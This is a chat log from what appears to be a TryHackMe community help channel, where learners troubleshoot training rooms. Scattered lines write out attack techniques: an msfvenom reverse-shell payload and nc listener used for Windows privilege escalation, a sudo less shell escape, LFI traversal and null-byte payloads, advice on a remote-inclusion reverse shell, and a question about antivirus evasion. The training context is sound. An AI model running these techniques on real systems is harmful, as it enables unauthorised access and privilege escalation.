#room-hints

right - but it's not the permissions the task wants me to end up with

Ill fiddle with it

it's supposed to end with sr-x

I'm following the directions exactly, but Im not getting the final execute to show up when I look at the permissions

Working on Burp Suite Basics Task 13
I have the map, but I don't see the odd endpoint per the hint

(And apparently, I can't send a screenshot )

What am I doing wrong?

Okay, Take 2!

Working on Burp Suite Basics Task 13
I have the map, but I don't see the odd endpoint per the hint

What am I doing wrong?

I'll try again

nada "turning it all off and on again" 😛

I thought about doing that - I just wanted to do the room the way it seemed designed instead of finding my own loophole. But maybe that's what I'm supposed to do is just add x myself

By the way the task is written, it seems like just by following the instructions I should be able to land on the right permissions but maybe I'm being too strict on following step by step

Since I'm learning and pretty new, just want to make sure I'm learning as I'm supposed to and not taking short cuts

I could also just 777 it probably?

Hi all,
I am struggling to catch my shell on the Linux PrivEsv room (Crontab section) as part of the Jr, pen tester path. Would somebody be willing to take a look at my cronjob and maybe let me know if everything looks good? I can't seem to see the issue

I've tried with kali and the attackbox (i usually use kali), i've also tried a few different ports

That will overwrite the perms. Appending a permission will be better

So what you have done yet?

Hi, turns out i hadn't adjusted permissions!

Yep its the only thing missing

thanks for the offer to help anyway 🙂

Gave +1 Rep to @cold eagle

Download the bash executable to your Downloads directory. Then use "cp ~/Downloads/bash ." to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using "sudo chown root bash ..... (((((( i am stucking here , first how to download the bash file in the attack box ... no internet access .. its getting more tough

I posted my question in another channel but no answers. So I try here 🙂
I'm doing the Metasploit: Exploitation room. I don't understand why at the task 6 I can't have a meterpreter session :

Type sessions?

Can you link the room please?

https://tryhackme.com/room/networkservices2

Exploiting NFS

I switch off the attack box and I tried with the kali linux machine but the same issue

The Kali Linux machine is outdated.

So what I've to do ? Retry with the attackbox ?

Link me the room plz.

https://tryhackme.com/room/metasploitexploitation#

What's your target IP?

It was 10.10.161.70

yes it is

I switched off all the machines. I am retrying with the attackbox. I'll let you know

😫 still doesn't work

where is the problem ???

https://tryhackme.com/room/networkservices2

it's the same @silk turtle

😅 my bad. ideed it works ! Thank you

figured it out. thanks

Gave +1 Rep to @burnt rivet

Hi,
does anybody can explain me the difference between

sudo -u someuser python3 /path/to/script
--> the user is not taken into account

sudo -u someuser python3.6 /path/to/script
--> it works

doing the wonderland chall, and do not undertand the difference.
I though that python3 is just point to last python3 instatlled version

alice@wonderland:~$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6*

forget my question, it is a sudo command restriction

Network Services 2, Task 9. I try to run this command: mysql -h [IP] -u [username] -p

but it says I dont have mysql installed

I try sudo apt install default-mysql-client

and Im getting an error about a malformed entry

Nevermind. I was able to complete the room without needing to deal with this

Once an attackbox is launched and it generates an IP address, is the IP address the client target machine ?

attackbox is your box

@trim badger But I have no target information but let me dig further into Anthem.

the target is the green "start machine" button. Some questions don't require it.

the ones that have that button are your targets

and when they're started, it will give you the targets IP up top

Thank you @trim badger looks like I was scanning my machine then 🤣

Gave +1 Rep to @trim badger

what is a directory listing flag mean in acme IT support?

ive been struggling on this hard

Find the dir that will give you flag.

thanks got it

Gave +1 Rep to @cold eagle

hi i need help for nmap task room 14 on practice. I did an Xmas scan on the first 999, except after that I didn't quite understand this question. I have to use the -vv switch but to find what exactly ?

yes and there are 999 open/filtered but this command gives two answers except that I can't find the second because I don't understand the question

the target responded with an ICMP unreachable packet. ?

but not open? ?

when there is a response from an open/filtered port that means the port is open but possibly there is a firewall?

but how does that answer the question should I use -vv ?

I have to use -vv?

but I don't understand the response format on the check

firewall ?

yes if the port is open there is no response like UDP but here I got the open/filtered

ok "no response"

so even if it is marked open/filtered it is not sure that it is open ?

it's good the answer is no response

"Locate the process that is running on the deployed instance (10.10.245.53). What flag is given?" on linux fundamentals part 3. I see a file whos user is "message+", so I'm assuming that is what I'm supposed look at. I'm not sure what to do from here, though. If I try reading the file I get a bunch of gibberish.

nevermind I'm stupid there was a flag right under it lol

hello, i have been working away on the room "kubernetes for everyone". the last task i have for it is Task 3. has anyone here done this room?

that kubernetes room is broken, check the room's help archive in #release-help-archives to see possible fixes, one is to download the container locally and solve it there

Guys

I am doing the burpsuite repeater room

in task 8

I stopped understanding everything beyond the point with the 500 Internal Server Error

Could someone please explain to me what's going on?

Guys i need little help in this room
https://tryhackme.com/room/xss

Of task 3 stored xss
2nd last question stealing jacks cookies

How can i grab cookie?

Guys, i just did the "Year of the Rabbit" room and get "bonus points" (+50 for user flag/+150 for root flag). What kind of room give this points? Is that a thing in thm or just for that specific room?

Some rooms have them, it's just extra points on top to the points they give.

Got it. Was wondering if maybe its a specific kind of room or module. I'll try the other 2 from the Alice series now. Thks.

Wonderland and Looking Glass?

Y

Those are good rooms, done by James.

hi randomguy, thanks so much for the pointer on that.. i was starting to go crazy. this is the last question i need to solve for this room... i did actually do just that- i downloaded the container to my attack box and looked at the file system but no flags.. (i guess the jokes on me?!) 🙂

Gave +1 Rep to @vagrant comet

ah, found it! (the funny? thing is i have seen that before but just didn't look close enough). that is the lesson for me on this room (pay attention!). Cheers

Nice, well done 🥳

thank you, it always feels good to root a box. 🙂

Gave +1 Rep to @vagrant comet

yop, doing looking glass room
i'm trying to automate the ssh game with python.
i use socket to connect but i only get the banner : 'SSH-2.0-dropbear\r\n'
how can i go one step further with socket to get the message ?

I though about using paramiko but it requires a password and i got only failed auth message

Paramiko doesn't work but paramiko-ng should

Small hint request for Network Services room Task 9... nudge me in the right direction for figuring out what variant of FTP is running on it. Nmap just says ftp and there seems to be nothing in the room that teaches you how to enumerate this info...
Stage: FTP Enumeration
What I've tried so far: only nmap scan, no idea what tool/technique I should use to figure out what variant of FTP is running

ok, no

I was resisting the temptation to source outside material as I figured I was missing a step or some key information provided in the room

alright

+rep @burnt rivet

Gave +1 Rep to @burnt rivet

i implemented divid and conquer algo with subprocess (not the best way but it works)

am i missing smthg, shouldnt i be able to run it as root?

or vi too as absolute?

Binary search? That's what was intended, I'm really glad someone actually did it that way.

thanks i got it now

Hey can someone help me in windows privilege escalation room from privilege escalation module
I am not able to RDP into the windows machine

think I did something similar

took like 5 or so steps

and apparently I was insane and did it in rust

❤️ I am proud of you

wait how many people brute forced that thing?

oh I never did a writeup for looking glass

Never too late!

i am solving now lazy admin but i am unable to edit through nano please guide me on this .

You need a stable shell with a terminal to use nano

But that looks like a permission denied error, try using vim or vi

Also, try export TERM=xterm iirc that's how you specify a terminal

Hey guys I'm working on incident handling with splunk. I'm stick on the instillation phase where the question ask, "
Search hash on the virustotal. What other name is associated with this file 3791.exe?". I simply can't figure out the answer. Please help me if you can!

have you done what it asked?

yes

well... I guess not. I'm not sure how to search hash on the virus total

virustotal is a website

https://www.virustotal.com

thank you so much! had no idea it was a site 😫
Much appreciated

Gave +1 Rep to @ripe hedge

cheers

hey guys so I'm trying to get the flag for one of the linux rooms after setting up the http python server but I keep getting a 404 error
I copied and paste it and used the wget command like it said
is there a problem with the linux room or am i just not doing it right lo

What’s the wget command and ur ip

@

@deep brook uh lol the wget followed by the link I'm trynna download files in order to get the flag using a python http server

What ip is in the command

um @deep brook

the ip that is in the link lol

Is it your up

Ip

yes that is why its not downloading right

request sent, awaiting response... 404 File not found
2022-06-25 00:22:21 ERROR 404: File not found.

What is the wget command put it here

And the name of the file you need to get

the name is .flag.txt

And is the file on a server

yeah it should be lol

wget http:// target ip /flag.txt

yes that is what i am typing in

only problem is my ip is the target ip lmao

You need to use the server’s ip not yours

Lol

yeah I know but on the task it gives me my ip lol

that is the target ip

like my machine ip is the same as the target ip

Yes and it’s not giving you the file

nope

it gives me an error instead

What ip does it show at the top of the webpage with a green oval

im on a vm as well not the attack box

the same ip it shows on the link lol

It shouldn’t be

Screenshot your webpage and put it here

\

see lol

Scroll up d

What does the very top look like

uh you mean my attackbox ip?

I thought you were in a vm

Just goto 10.10.10.10 and tell me if it says ur connected

I am on a vm lol

Could it be the . Before flag

in the home directory

oh so no. lemme try that

it tells me t start the webserver in the home directory though>

?

@burnt rivet

Try wget without the . Before flag jic

Yeah I am aware of that thank you

HTTP request sent, awaiting response... 404 File not found
2022-06-25 00:34:47 ERROR 404: File not found.

@burnt rivet

oh

?

so set up the server on tryhackme then

got it

@burnt rivet oh I guess I was confused about that thanks for the help and clarification

Gave +1 Rep to @burnt rivet

@deep brook thanks to you as well

Gave +1 Rep to @deep brook

Np

Just curious, is there a precursor for Aircrack suite rather than Wifi Hacking 101 on THM? Or do I learn about those elsewhere then start

Can anyone tell me how long the bruteforce attack on the FTP Server in Task 10 of Network Services should take?

Disregard. Worked out what I was doing wrong.

Bruteforce attacks in labs should take between 1-5 min if that does not work know that maybe there is a problem.

owasp Juice shop is the only exception to this.

The docs and man pages for it.

Kk, ty

Gave +1 Rep to @stuck fractal

Am in sql injection task 5 and when i hit the machine to start it all eork good but the given link is not vild... it says that it took to long time

any advice guys

I completed PreSec and now I'm just going through web fundamentals trying to learn web

I found a login page on /wp-admin in Tech_Spport:1 what should I do now. I'm pretty stuck

I ran wpscan and found support

Look at ||smbclient||

Heya! I'm on the network services room, task 7 => exploitint telnet and i have an issue while running nc -lvp 4444 on my computer, i systematically get a nc: getnameinfo: Temporary failure in name resolution, yet vpn is connected, i can ping 10.10.10.10 succesfully and i'm connected on the telnet on the remote server, no firewall on my side and can't figure out what i'm missing out here

payload generated correctly from mfsvenom

NVM : bad conf on resolv.conf

Try using nc -lvnp 4444, stops resolving DNS :)

Let me know if that works, just a guess.

oh i already fixed the issue ^^ but thanks anyway :p

ah no issues, have a nice day :)

this was the issue

ah i didnt see that

glad you fixed it :>

yup and now it's lights out, 6hours of tryhackme after 8hours of coding today it's a bit much hahaha

yeah take a break, sounds like something id do

Yo

yoo

yo

Stuck at 'One Piece Room' Task2-Q6. Specially the encoding part need help!!

Hi all, Regarding Athem CTF flags 1 and 2. I have discovered 2 flags but they are not recognised. Can I get some hints pleeease ? Thanks.

Can you give the link, I can't find it when searching

Which 2?

Either DM them to me, or post with spoilers.

Thank you @lucid junco

Gave +1 Rep to @lucid junco

Hi! I'm doing my first attempt of the Easy Peasy CTF Room. In the introduction to gobuster room I had to manually add the site I wanted to search through to /etc/hosts using: echo "MACHINE_IP webenum.thm" >> /etc/hosts before gobuster was able to make a connection

Now that I have only been provided an IP address (and no domain name), how can I find the domain I have to add to /etc/hosts to be able to use gobuster for searching the flags?

You don't necessarily have to add a host name for every room, just use the IP in that case

Okay, but when I try to use gobuster dir -u http://10.10.240.204 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt I get an error

Error: error on running goubster: unable to connect to http://10.10.240.204/: Get http://10.10.240.204/: dial tcp 10.10.240.204:80: connect: no route to host

Are you on your own machine or the attackbox?

Attackbox

You sure you are using the correct IP of the target machine ?

Yup!

10.10.240.204

Mh, so if you are sure you got the IP out of the "Active machine information" box that's looking like that:

That's right!

Then I suggest to refresh the room page, maybe the machine expired, the timer sometimes is a little bit buggy

Or simply try to terminate the target machine and start a new one

Okay! Will try that!

Gobuster does not always need the target IP and domain to be placed into /etc/hosts as in the tutorial?

No

That did the trick, thanks!

Gave +1 Rep to @left thunder

Hi,
doing blue room. Almost new to metasloit... trying to exploit the ms17...

i configured RHOSTS and payload but when i run the exploit i get the following message
[*] Exploit completed, but no session was created.

did i miss anything ?

[+] 10.10.151.50:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] 10.10.151.50:445 - Sending egg to corrupted connection.
[] 10.10.151.50:445 - Triggering free of corrupted buffer.
[-] 10.10.151.50:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.151.50:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.151.50:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Have you set Lhost to tun0?

you are right... it is pointing to my eth interface (also in 10.x.x.x and i did not see it)

error message was not clear and i begin with msf !
thank you !

Gave +1 Rep to @lucid junco

finally installed a VM , now im connected. got a flag, but where do i post this flag, any hints? Tried searching for entry level rooms.

tnx, gonna check it out

it was there.

im doing https://tryhackme.com/room/windowsprivesc20 task 5 and im trying to set up a shell to get the flag for svcusr2's desktop.
im in the Unquoted Service Paths section.
i did icacls c:\MyPrograms in the windows machine
then i sent the payload msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe

then opened up netcat via nc -lvp 4446
i then spun up a http server using python3 -m http.server in a separate terminal from the attackbox
i then went to the windows machine to powershell and did
wget http://10.10.96.110:8000/rev-svc2.exe -O rev-svc2.exe to get the file off the attackbox
i then moved the file to the right spot via powerhsell in the win machine using
PS C:\Users\thm-unpriv> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
and i assigned the proper permissions using
PS C:\Users\thm-unpriv> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
i then tried in both powerhsell and cmd
PS C:> sc stop "disk sorter enterprise"
sc : Access to the path 'C:\stop' is denied.
At line:1 char:1

• sc stop "disk sorter enterprise"

•   + CategoryInfo          : PermissionDenied: (C:\stop:String) [Set-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentWriterUnauthorizedAccessError,Microsoft.PowerShell.Commands.SetContentCommand
  
  

PS C:> sc start "disk sorter enterprise"
sc : Access to the path 'C:\start' is denied.
At line:1 char:1

• sc start "disk sorter enterprise"

•   + CategoryInfo          : PermissionDenied: (C:\start:String) [Set-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentWriterUnauthorizedAccessError,Microsoft.PowerShell.Commands.SetContentCommand
  

but the service doesnt exist and wont start
also i cant seem to get the shell either. at what point did i do something wrong to exploit this service and get the shell. why am i getting this error?

You’re doing it in powershell, exit the powershell shell and do it in cmd 🙂

I think?

Set-Content]

Powershell doesn’t recognize sc iirc

it does

but

sc is short for Set-Content when in powershell

Ahhhh yes

You need to do sc.exe
I believe this is explicitly noted in some of the content

@pallid moss Do you remember what room you set the added hint with sc for?

I just remember I exited the powershell shell and did same command in cmd, and it worked fine for me

i tried in both powershell and cmd but neither worked

ill have to do sc.exe

i restarted the box so im replicating the steps up until that point

finally got the shell!!!!!!!!

Nice!

I can't find it at the moment...

Wait, found it, #general message

So it's https://tryhackme.com/room/winprivesc Task 2 at the very least.

It's set as a reminder in Task 6 just before the questions too

I think it needs to go onto the new one as well, not sure who made it

Gotcha, I'll get that added. I QA'd that too, so not sure now i missed that

It's not an issue if you do the room properly, the Terminal boxes on the site are even titled "Command Prompt"

But people change things. Yup, makes sense.

Oh... It is in there at least in task 5, it was in my testing notes

I couldn't see it but I spent about 30s looking

Cc @potent stirrup instructions are in there for PowerShell

It's in there when you (should) first switch from powershell back to command prompt and do something with sc. I'll add a reminder

It's in there twice now, so hopefully that'll be enough 🙂

Hey so im on the manual discovery favicon part of the content discovery room, the hash that I get by entering the command is not the hash the answer wants is the database outdated?

The specific room is Jr Pentetration Tester - Content Discovery - Manual Discovery Favicon

Hi does anyone have some clues on what is the || ariadne binary file located in /home/ariadne|| in the theseus room ?

strings not giving you any useful output???

nope, not that i can see, it was my first try

i look at it with binwalk too, nothing

Any hints on lateralmovementpivoting room - task 5? Did everything up to the winrs command. Got the shell with pass the hash but when the winrs.exe command is run to get a cmd on THMIIS it says:

winrs error: The user name or password is incorrect.

@burnt rivet it doesn't give me 404 the command gives me the hash I need to check against the database, when I check that specific hash against the database the framework I got from that does not match the amount of letters the answer is looking for, the answer is one word 6 letters the hash matched to a company with two words

@burnt rivet I will try that tonight after work, thank you

Gave +1 Rep to @burnt rivet

pickle rick
i've gotten into the login page and have logged in, i've put together that the command thing is like a mini linux terminal. but i cannot cat files around to view them so i assume there needs priviledge escliation i was wondering if anyone could link or talk about some of the rescorces needed for it? i've been working through this for 2 or 3 days now slowly bumping into things like a bee in a flower patch

there's other commands for reading file content than cat, some examples are less, more,head,or just straight up start echoing the file with

while read line;do echo $line;done < file.txt

what language is that in? or is that linux terminal? because i've never heard of a line like that before and dont full understand how to digest it other then
while reading the line in this case ||Sup3rS3cretPickl3Ingred.txt|| ; [meaning new syntax just same line] do echo so that when its reading it echos ||Sup3rS3cretPickl3Ingred||.txt i dont understnad $ line being like a variable of the desinated ||Sup3rS3cretPickl3Ingred||.txt;done to close it off and <||Sup3rS3cretPickl3Ingred.txt|| is the assigned value of line

is that kinda how its read?

that's bash and yes, it's "terminal linux" as you call it

the command is working as follows:
while keep reading the line;do echo the line you've read;and then stop when you're done (take the file content with the redirect <) and filename is this file.txt

okay bash is the propper term sweet cuz i def gotta brush up on it im just at the part when i can barely comfortably maneuver around the terminal

yes, bash scripting is very powerful and quick for simple tasks once you get the hang of it

yeah so far i love how quick bash is even at half power of my computer, and the depth of it useabilit

im on javapoint rn n i see the while read line;do ect.... theres a lot here

hello im new andd trying to figure these questiona out. im doing the wireless can i ask a question

Sure, but it'll be easier if you're verified and can send screenshots

!docs verify

thank you im verified

@earnest charmthank you

Now you can just ask the questions and if needed add pictures

thank you I'm going to try and research more first lol i think i understand the need to develop good fact finding skills first lol ,,,, but thank you so much!!!@earnest charm

In the Burp suite repeater room, task 6. I added a header called FlagAuthorised and set it to have a value of True, as shown in the screenshot, then pressed "send", but I don't see any flag in the response.

Haven’t done the room, but I would try removing the colon after True

I'd suggest asking in #lateral-movement-and-pivoting if you haven't already 🙂

i checked and its working

i think the headers are different, please check if you are running the correct machine attached to the task

Thanks, that helped.

Gave +1 Rep to @lyric lichen

hello guys

im on xss room

dont know why i cant get the answer from the server

im specifying the port correctly?

ooo

didnt know that...

and why with the attack box works?

luuul

how did you discover that

XD

yeah, just that

didnt know why didnt work

but if they already know

dont need to say nothing i guess

okay

perfect then

!docs

!dics verify

oops fat fingers

!docs verify

I'm in Anthem right now. I really want to gain control using a method not described in the question's section [outside the scope]. I need sanity, badly.
I'm trying to run RCE. Uploading a powershell script set to run when invoked. Antivirus is blocking it. Here's a screenshot:

I need to know, can I encode this somehow? Would that even bypass AV or am I just beating my head against the wall?

don't think that's shown in any other room than holo?

nitro died

I just didn't know what I was looking for. I didn't grow up doing this....

but thanks for the pointer

Island Orchestration. sorry for my mistake

Besides Clock and Network, what other icon is visible in the Notification Area?

Any help

Again, what room are you looking for assistance with?

Sounds like you're quoting a specific question

It's Windows Fundimentals 1

yeah lol

So what's the issue exactly?

They resolved this in #general

hi people, doing RELEVANT and i cant not enter smb without password when on the video shows it doesnt need.. any suggestion??

❯ smbclient //10.10.182.73/nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)

❯ smbclient \10.10.182.73\nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)

looks like your machine run out

yeah... but everything works fine and the time machine is ok

what is the room name?

RELEVANT

Is it okay if I ask a question about a THM question here?

Hi guys, i'm kinda stuck on file inclusion room task4 question 2. I'm seeing the error page but i don't understand what exactly is expected as answer, i have tried a lot of directories that i see in the error message, all without success. Can someone push me in the right direction?

i have tried /lib/php , /var/www, /usr/lib but nothing seems to work

nvm, it was right on my face

Get the point
Add after the Php the needed arguments
Xxxx/lab.php?file=/etc/passwd

!docs levels

!docs api

Hello guys, I'm on the Buffer Overflows room (/room/bof1) and I'm stuck on the exercise where I'm supposed to overwrite a function pointer. I understand that I need to fill the buffer and then write the address of the function. I looked for the function adress with radare2, I then wrote it after the end of the buffer in a Little Endian format but I just get a segmentation fault 😦

Do you have access to the binary on local or have to perform a blind attack on remote?

I have full access to the binary

I'd say the first step is to check the buffer's size. Then, find the overflowing function (e.g. gets in C), then overflow that function and check what is actually getting overflowed.

For example there's a difference between overwriting the actual instruction pointer and changing the RET address the pointer points to. These look different in the registers if you look at them.

Binary exploitation is very contextual, so it's hard to help without knowing the details.

This is indeed a gets overflowing function. I know that I need at least 15 char to overflow it so I put 14 chars and then the begin address of the function I want to go to

the C code :

What's the goal of this challenge? To execute special() from the overflow?

yes, it normally goes to the "normal" function and we need to go to the "special" function

You should check the registers after your buffer overflow.

In gdb you can do this with a simple info registers

ok I'll try that to see what's happening

Thanks !

For this scenario you'd want the RIP (64 bits) or EIP (32 bits) to have the value of your overflow.

Ok I found my problem, in fact I was doing right (kinda) but in the hex adress there is a "05" which corresponds to the ENQUIRY character in ASCII

I don't know how to write the ENQ char...

print(padding*offset+hex)

python will print the \x05 as the correct value

You can pipe that into the binary

Ctrl+E works ^

I'd just write a simple script with pwnlib.

Instead of trying to press the correct characters for the ASCII haha

Done :

good idea ^^

Thanks for the help !

Your first ever bufferoverflow!

Well done!

thanks !!

Gave +1 Rep to @zealous frost

If you need anymore help in the future, don't hesitate to ask! When I have time I always like to help out others!

Ok nice, will do !

Hello, how do you get the pentester rank?

So today it is no longer possible?

Ok, thanks for the help.

Hi All, After a hint for the Sakura room if anyone can help.
I am on the part where i need to go to the darkweb and find the SSID and password. I have only been on the darkweb a few times and not 100% sure on how i would search for this on there?

would i just add .onion to the end of the string i find on twitter?

I think so, iirc they gave the solution in a hint for people who didn't feel comfortable going to the dark wev

https://tryhackme.com/room/wiresharkthebasics In task 2.3 Something wrong this hash sha256. The hash from info not works. Anyone can help me with this task?

wait a minute, is this a new room or an older one, cuz I think I've done this but the tasks are unanswered

ooh just got released, nice

cat file.pcap | sha256sum should work tho

I have one left

not works bro

try uploading the file to cyberchef if you can and use the sha256 recipe

have you done this room?

nope

i think this task is broken

¯_(ツ)_/¯

omg

Try this room and let me know if you done task2

I was about to ask about this room

What hash are you trying? (use spoilers or DM me)

check your dm

I DMed too

Copied the sha256 in the wireshark's capture properties and tried sha256sum in the terminal. Both gave the same value and the answer is wrong

i kinda decoded it. but. ? what is that??

woah, that's almost a year ago

👀

And @inner flower I've posted in Site bugs.

So, next time we can just mention it there directly?

Thank you

credit to OG poster on forum room: just remove the last char of the digest. Turns out its a copypasta problem.

Staff have also fixed the issue.

hi

anyone on?

I need help with the LFI challenge?

I tried changing request to POST request and I am wondering why it won't work?

the problem is I can't figure out what to do next. I go into web developer console and change it to POST, then I try posting something but it won't get me anything

I tried using file parameter

wait I figured it out

never mind

it was challenge 1

I am doing challenge 2

this stuff gets harder as you go along

fun challenges

how am I supposed to solve this if an input box won't appear?

I can change the cookie to admin and that appears to be one step but I keep trying to specify file in URL

and it won't help

right but I am trying to do it in URL and that isn't working

is it something I can type in URL?

inspect element?

ok

do I need burp suite?

No

ok

if I already did the HTTP web basics pathway twice do you recommend redoing it for this challenge?

Not sure if it would help.
You have to play around a bit with the stuff you have already available and caused already changes on the page.

ok

I will keep trying

this stuff is not easy lol

Well, it's a challenge.
But it's not that complicated, so don't overthink it.
Once you see how the site behaves on certain changes, it should get clear 🙂

oh yeah that thingy

Trying to download .flag.txt but just getting HTTP request sent, awaiting response... and nothing happens

send a screenshot

Thank you @pastel turret I was running the WGET from the wrong device. Now that its downloaded, where does it store the file ? Under what folder

Gave +1 Rep to @pastel turret

under a folder you run a command, should be /home/your username

or you can use a command find

@pastel turret wget http://10.10.55.255:8000/.flag.txt
--2022-07-06 03:46:59-- http://10.10.55.255:8000/.flag.txt
Connecting to 10.10.55.255:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20 [text/plain]
Saving to: \u2018.flag.txt\u2019

.flag.txt 100%[===================>] 20 --.-KB/s in 0.001s

2022-07-06 03:46:59 (34.2 KB/s) - \u2018.flag.txt\u2019 saved [20/20]

tired to use the find cmd

so it would we under /home/tryhackme

use command ls -la

to guide yourself

Thanks a lot, i realized my mistake.

Gave +1 Rep to @pastel turret

i am creating an output with > and i dont see anything there

Are you giving it a name after the > ?

yes

the folder gets created with nothing in it

Shouldn't it be a .txt file not folder ?

im sorry yea its still a .txt file

nothing in it

From the screenshot I saw before, it looked like you didn't even start the target machine yet

Yep, do you see how it says "MACHINE_IP" ?

yea i had to reset everything i think i forgot to start it up again lol

ur right

https://tryhackme.com/room/windowsprivesc20 I was unable to complete task4; my target machine is unable to connect a reverse shell onto my attackbox. Help i can't fix it by days

guys im clueless kinda on how to use the ?key parameter on 8080 of a machine to do remote fileinclusion in order to open a reverse shell.

Host a server on your machine using python and and paste the link of your IP with reverseshell.php

hi i have a question

why im isnt room with that

@white salmon sry if i talk here

but i dont understand "command mode"

i just did sudo less /etc/profile

then did !bin/bash

@novel pike
sudo less $FILE
SHIFT+: <--- press this on keyboard.
!/bin/bash <---- type this command
ENTER <--- press this on keyboard

Its not what i did ?

It's not.

Ah you want that i write $FILE ?

Ideally, I'd like you to take a step back. Review the basics, then read the instructions I've provided.

It'll click eventually 🙂

Ok ty which basics Can i review to progress ?

Gave +1 Rep to @zealous frost

https://linuxjourney.com/ complete every lesson in this website!

It will teach you all the basics you need for working with linux distro.

https://tryhackme.com/module/linux-fundamentals

You can do this room too.

Ok i will go to your link, but what was wrong with what i wrote ?

You'll find out later, don't worry.

Ok ok i will read linux fondamental ty

I don't receive a CanRestart option after I run Invoke-AllChecks on Task 3 in the Steel Mountain room. Has anyone come across this issue as well?

@white salmon i litteraly read all the 3 headings and i dont know where do you want me to check

give me chapters or anything please

I gave you enough information to solve your problems, but I can't solve them for you, or rather, I won't.

it says /etc/flag2 not available on the server in LFI challenge 2

could someone give me a hint without giving me the answer

I checked the cookies and got admin success page to show up

I am trying to figure out how to send input to the server

don't want a spoiler

If you provide information, I'll point you in the right direction.

so I'm trying to figure out challenge 2, at the end of the LFI room

and

I checked my cookies and figured out how to modify the cookie

so now I'm playing with modifying cookies to get maybe an input box

I don't know by heart every room on THM. You need to share a few screenshots and details on what you want to achieve.

I got the success message to show up by switching cookie to admin

ok

hold on

I got to that section

I modified the cookie from guest to admin and managed to get the success page to show up

however, that's about as far as I have been able to get

I have been playing with the stored cookies because the challenge wants me to access the /etc/flag2 file

and there's no input box

so I have to figure out how to send input without box

and URL isn't doing it

on its own at least

This room is based on local file inclusion. How familiar are you with LFI/RFI?

I just completed the LFI and RFI room

or most of it

except this challenge and the ones after it

yesterday I completed it

and I did challenge 1

so now doing challenge 2

How did you solve the first challenge?

I just need a hint in the right direction. I don't want to be given answer.

I had to modify a GET request to make it a post request and then post to a file and in the error message I got the flag (I think so, but I may be remembering wrong)

something like that

took me a while to figure out

I'd recommend to test the broader surface, rather than straight diving into that cookie.

Consider this:
Why did you instantly focus on cookie? What steps you took to identify it as a vulnerability? What made you think you could chain in into an attack vector?

well I tried modifying the URL using $00 and other things as well like // etc

hello!, rn i am doing the blue room and i cant get the exploit to work. i tried to reset the machine and wait at least 5 min before redoing the exploit and changing the lport in case of a port not closing down. any suggestions?

there's no input box so I figured there's no inptu box

so I figured that

it always fails at Triggering free of corrupted buffer.

I looked at the hint and it said to check cookies

and from there the success page showed up but no input box or flag

I don't think I need Burp for this tho

so I'm confused as to where to look?

Is the exploit eternal blue ?

yes

i used openvpn and i am trying the attack box rn

so what should I focus on aside from the cookies?

like where should I look?

If you believe the cookie is vulnerable, then attempt to include the file you want from machine.

I did this today several times and it didn't work

Try to think of where the /etc/ directory is located on the linux hierarchy, then think where application folder is usually located at.

Traverse from application folder to the /etc/ folder.

ok thanks

Check which type of PHP application it is.

Older versions vulnerable to null bytes.

ok thanks

That's all you need.

ok thanks

Ensure you put the correct options in metasploit if you are using that.

i did

i did the same thing with the attackbox and it worked

Awkward moment

Ok I will keep going thanks

does JavaScript console have any relevance?

or should I just keep looking at the cookies?

ok

thanks

I keep modifying the path of the cookie

and it doesn't do anything except give me errors. is it just in cookie modification path? when I switched the value to Admin that gave a positive result

hold on

I switched it to post

so I mean hold on a second

ok I keep trying to change the file path and it doesn't work

ok

"Fucked it up" 😄

so I found that %00 gets written as blank when pasted in the value section

That's a null byte. It can help indicate the end of code execution or array or etc.

It affects some older versions of PHP.

https://tenor.com/view/mindblown-omg-triggered-gif-19814900

is that closer?

like am reading through room materials second time in a row and looked back on earlier page

or should I just reread it start to finish?

You are on the right track.

Just need to get more familiar with LFI.

Ok thanks

hi, do you think I should do the How the Web Works Series again?

I'm thinking of doing that so I can solve this current room on LFI

maybe then I could start the LFI room again

would that be an ideal way to go?

i dont think so, the material should be enough.. lemme pop it open, did it couple days ago

are you doing the Web Fundamentals path tho?

@mighty estuary you can complete that question with the content available in the room, i'd say don't over think it.. go back to the basics/the start (even if that means clearing the cookies)

hello, I'm on task 4 of the Networking Services Room. I'm having trouble with the last two questions

the only hint is "What is the default name of an SSH identity file?". I've looked it up so I know the answer but dont understand how to derive it from the information in the exercise. Since i need to download this id_rsa file which I havent actually found to complete the task, im kinda stuck

ive tried reading the contents of all files in this shared folder but I must be missing something

Did you look inside the subfolders as well ?

I'm a dummy, was using more instead of cd and ls 🥶

thanks

Hiya! I'm on question 3 of Linux fundamentals part 3. I launched python3 -m http.server and the next link pops up in the terminal, but nothing happens after that and it doesn't start another tryhackme command line so I can't type in the wget command to get the flag. Am I doing something wrong? :/

line*

Gotcha! Thanks!

I thought I had verified before I asked my question in here, but I will double check to confirm. Thanks!

so where am i able to find the email password combo

these are the names i was able to scrape previously

what do u mean

👀

i feel like im lost now.... what about it?

ah

If it has all that other shit in it,
never heard a better explanation imo

hi I'm redoing LFI room and I'm having trouble with Lab 6

I get to the point where I am including the THM-profile directory and I am trying to get outside of that directory using /.../../.. or ..//..//..//..

and trying to get to the file I'm trying to read in /etc/ folder

but it won't work

could someone give me a hint

thanks

please don't give me the answer tho

I tried without double dotdotslashes but ya ok

ok thanks solved it

